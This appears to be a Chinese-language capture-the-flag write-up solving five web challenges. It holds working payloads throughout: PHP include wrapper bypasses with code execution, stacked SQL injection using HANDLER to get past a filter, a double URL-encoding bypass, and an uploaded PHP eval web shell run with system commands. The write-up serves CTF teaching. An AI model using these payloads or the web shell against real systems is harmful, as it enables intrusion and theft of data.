攻防世界-web进阶[部分题目wirteup]

1、Web_php_include2、supersqli3、web24、PHP25、upload1

1、Web_php_include

源码：

<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?>

考察php文件包含 知识点： 1、strstr()函数，strstr() 函数搜索字符串在另一字符串中是否存在，如果是，返回该字符串及剩余部分，否则返回 FALSE。该函数是区分大小写的。如需进行不区分大小写的搜索，请使用 stristr() 函数 2、str_replace()函数，str_replace() 函数替换字符串中的一些字符（区分大小写） 3、利用php伪协议大小写绕过

php伪协议 用法 php://input,用于执行php代码，需要post请求提交数据。 php://filter,用于读取源码，get提交参数。 ?a=php://filter/read=convert.base64/resource=xxx.php 需要开启allow_url_fopen:php://input、php://stdin、php://memory、php://temp 不需要开启allow_url_fopen:php://filter

payload: ?page=pHP://input post:<?php phpinfo();?>

4、data伪协议代码执行

data协议 用法： data://text/plain,xxxx(要执行的php代码) data://text/plain;base64,xxxx(base64编码后的数据) 例： ?page=data://text/plain, ?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=

更多内容可参考：《Web_php_include》

2、supersqli

1' or 1 -- + //--与+之间有空格 1' order by 2 -- + //两个字段 1' union select 1,2 -- + //被函数preg_match替换，preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 1';show databases -- + //堆叠查询数据库，发现supersqli 1';show tables from supersqli;-- + //堆叠查询supersqli中的表，1919810931114514、words 1';show columns from `1919810931114514` -- + //发现flag 1';show columns from `words` -- + //columns:id、data 1';handler `1919810931114514` open;handler `1919810931114514` read first;-- +

那么，我们来看看Handler语法说明：

HANDLER tbl_name OPEN [ [AS] alias] HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,…) [ WHERE where_condition ] [LIMIT … ] HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST } [ WHERE where_condition ] [LIMIT … ] HANDLER tbl_name READ { FIRST | NEXT } [ WHERE where_condition ] [LIMIT … ] HANDLER tbl_name CLOSE

先用handler命令open打开表，再handler…read…读取表中的内容，其中read可以使用first、next遍历，还可以配合limit来遍历

3、web2

源码：

<?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ $_o=strrev($str); // echo $_o; for($_0=0;$_0<strlen($_o);$_0++){ $_c=substr($_o,$_0,1); $__=ord($_c)+1; $_c=chr($__); $_=$_.$_c; } return str_rot13(strrev(base64_encode($_))); } highlight_file(__FILE__); /* 逆向加密算法，解密$miwen就是flag */ ?>

str_rot13，ROT13 编码把每一个字母在字母表中向前移动 13 个字母。数字和非字母字符保持不变。 提示：编码和解码都是由相同的函数完成的。如果您把已编码的字符串作为参数，那么将返回原始字符串。

直接修改代码即可获得flag

<?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; $temp=base64_decode(strrev(str_rot13($miwen))); function decode($str){ $_o=$str; $_=''; for($_0=0;$_0<strlen($_o);$_0++){ $_c=substr($_o,$_0,1); $__=ord($_c)-1; $_c=chr($__); $_=$_.$_c; } return strrev($_); } print_r(decode($temp)); ?>

4、PHP2

题目的坑点在是否能发现index.phps。

phps文件就是php的源代码文件，通常用于提供给用户（访问者）查看php代码，因为用户无法直接通过Web浏览器看到php文件的内容，所以需要用phps文件代替。其实，只要不用php等已经在服务器中注册过的MIME类型为文件即可，但为了国际通用，所以才用了phps文件类型。 它的MIME类型为：text/html, application/x-httpd-php-source, application/x-httpd-php3-source。

源码：

<?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[id] == "admin") { echo "<p>Access granted!</p>"; echo "<p>Key: xxxxxxx </p>"; } ?>

admin二次url编码绕过，获得flag

5、upload1

直接上传一张图片，用burpsuite的repeater功能修改后缀为php，再写入代码<?php @eval($_REQUEST[shell]);?> 浏览器访问： upload/1601886287.1.php?shell=system(“pwd”); /var/www/html/upload upload/1601886287.1.php?shell=system(“find /var/www/ -name “flag””); /var/www/html/flag.php upload/1601886287.1.php?shell=system(“cat /var/www/html/flag.php”); flag在源码中

文章如有不正确的地方，请各位交流指正。